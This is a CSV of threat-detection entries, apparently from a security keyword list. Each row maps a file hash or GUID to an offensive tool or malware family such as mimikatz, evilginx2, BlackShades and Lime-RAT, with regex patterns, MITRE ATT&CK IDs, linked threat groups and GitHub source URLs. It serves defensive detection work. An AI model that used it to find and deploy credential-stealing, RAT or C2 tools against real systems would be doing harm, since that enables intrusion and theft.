"*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*",".{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","23532"
"*26ee5086d8cc0404b7088ebe9e121e090261ce9185a9d4bf2394504fc8415f45*",".{0,1000}26ee5086d8cc0404b7088ebe9e121e090261ce9185a9d4bf2394504fc8415f45.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","23533"
"*26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a*",".{0,1000}26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23534"
"*26fcb5597cb7d3eddd3bb24440de6555b3d34af4c9a3874b71fa27aff18ea3d5*",".{0,1000}26fcb5597cb7d3eddd3bb24440de6555b3d34af4c9a3874b71fa27aff18ea3d5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23535"
"*270261e8d576273808fa6084a665ca4251dc3bdd2cc849cfcdae2a042b21d8d3*",".{0,1000}270261e8d576273808fa6084a665ca4251dc3bdd2cc849cfcdae2a042b21d8d3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23536"
"*2704649168fdd21796f1a46221a6e133105230e88070863976733d386a6ab204*",".{0,1000}2704649168fdd21796f1a46221a6e133105230e88070863976733d386a6ab204.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","23537"
"*27049d9f4a7125e9be92e84edcad5dc118bc8503920fb3250b3e2f7577370b49*",".{0,1000}27049d9f4a7125e9be92e84edcad5dc118bc8503920fb3250b3e2f7577370b49.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","#filehash","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","23538"
"*2709ef4de6f00a57c05cf4a39228cf87fa522abe20318aa4a09b34ba6cf7eea2*",".{0,1000}2709ef4de6f00a57c05cf4a39228cf87fa522abe20318aa4a09b34ba6cf7eea2.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","23539"
"*270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1*",".{0,1000}270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23540"
"*2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6*",".{0,1000}2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23541"
"*2720ade6e794942ef6b2340db083e2e8ae392ca5ca08e71aae5329865b13e814*",".{0,1000}2720ade6e794942ef6b2340db083e2e8ae392ca5ca08e71aae5329865b13e814.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","23542"
"*272175f4d98a6ab59e2f589ba7391fc36659b04d0f27f9cb6a300cf49dfd2016*",".{0,1000}272175f4d98a6ab59e2f589ba7391fc36659b04d0f27f9cb6a300cf49dfd2016.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23543"
"*272dd72f9bdff7973ed8b642bf8713ece481e208a77fd03b6a24f2b520e1d49e*",".{0,1000}272dd72f9bdff7973ed8b642bf8713ece481e208a77fd03b6a24f2b520e1d49e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23546"
"*27384243d50bfa14910b2a3993a1b42b8e44ce75bf94f3d17b1ee02a7ce66144*",".{0,1000}27384243d50bfa14910b2a3993a1b42b8e44ce75bf94f3d17b1ee02a7ce66144.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23548"
"*27428e1d8aa5a20e6474049810d7615dd529c9671f331b9bf8f6c959ed36d7b5*",".{0,1000}27428e1d8aa5a20e6474049810d7615dd529c9671f331b9bf8f6c959ed36d7b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23550"
"*2747fb657f7469ba916c90e46cf298bcb89d1fc92d8aa8956081db0e631c779b*",".{0,1000}2747fb657f7469ba916c90e46cf298bcb89d1fc92d8aa8956081db0e631c779b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23551"
"*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23552"
"*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23553"
"*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23554"
"*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23555"
"*274F19EC-7CBA-4FC7-80E6-BB41C1FE6728*",".{0,1000}274F19EC\-7CBA\-4FC7\-80E6\-BB41C1FE6728.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","#GUIDproject","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","23556"
"*2759a95c63a2af0eed9d3202d961ddb72d4da05ea44653d400f9003e0a492064*",".{0,1000}2759a95c63a2af0eed9d3202d961ddb72d4da05ea44653d400f9003e0a492064.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","23557"
"*2764294962b243eb9359e8678fd76af9b2dc2d061a78942b717eccc5f1a1aaad*",".{0,1000}2764294962b243eb9359e8678fd76af9b2dc2d061a78942b717eccc5f1a1aaad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23561"
"*276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd*",".{0,1000}276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23562"
"*277279ef4352ec8709c69d481ac9ef31fb1c07070999e229ce74ef76e57d5f84*",".{0,1000}277279ef4352ec8709c69d481ac9ef31fb1c07070999e229ce74ef76e57d5f84.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23564"
"*27744baf01464354d336015e1051fdc6706235549f5e62e0230e139eb743b4bb*",".{0,1000}27744baf01464354d336015e1051fdc6706235549f5e62e0230e139eb743b4bb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23565"
"*27758795eda198b3d41b490d11b0a33684b63aa2d33c716c65c2242d60b78838*",".{0,1000}27758795eda198b3d41b490d11b0a33684b63aa2d33c716c65c2242d60b78838.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23566"
"*2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92*",".{0,1000}2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23567"
"*277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d*",".{0,1000}277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23568"
"*2787cc9e36cc2aebada79515e19ca4daf36887a091ec8f41af187c96df4147af*",".{0,1000}2787cc9e36cc2aebada79515e19ca4daf36887a091ec8f41af187c96df4147af.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","23571"
"*278934b8bf08d452d343a4da60e7453aba6bee5b20a7d91eaaac571131a4b623*",".{0,1000}278934b8bf08d452d343a4da60e7453aba6bee5b20a7d91eaaac571131a4b623.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23572"
"*2792b5ccfc554b6472ba069194bedae622380a34a8199e1e91be21a0dd1050c1*",".{0,1000}2792b5ccfc554b6472ba069194bedae622380a34a8199e1e91be21a0dd1050c1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23573"
"*2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91*",".{0,1000}2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23574"
"*279937cdd074cd255e0d4ee39b565440ea12cf4e23b1903a4c1cfa433e296b24*",".{0,1000}279937cdd074cd255e0d4ee39b565440ea12cf4e23b1903a4c1cfa433e296b24.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23575"
"*27b23ebc1517a37b652dacbdc375db6220fa005bdfe4f7d522d6f1e277688541*",".{0,1000}27b23ebc1517a37b652dacbdc375db6220fa005bdfe4f7d522d6f1e277688541.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23577"
"*27b5e167bc93846e1dd8175a36012073676173be8dc7c951bb4d8ac5fee576e0*",".{0,1000}27b5e167bc93846e1dd8175a36012073676173be8dc7c951bb4d8ac5fee576e0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23578"
"*27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a*",".{0,1000}27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23581"
"*27cc5348dd41818e79d5d87ee9d78e0f6ddc331f31c72ef0d4073f38d4fe4637*",".{0,1000}27cc5348dd41818e79d5d87ee9d78e0f6ddc331f31c72ef0d4073f38d4fe4637.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23582"
"*27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D*",".{0,1000}27CF1AE0\-5FDE\-4B31\-A4DA\-6FAD1D77351D.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23583"
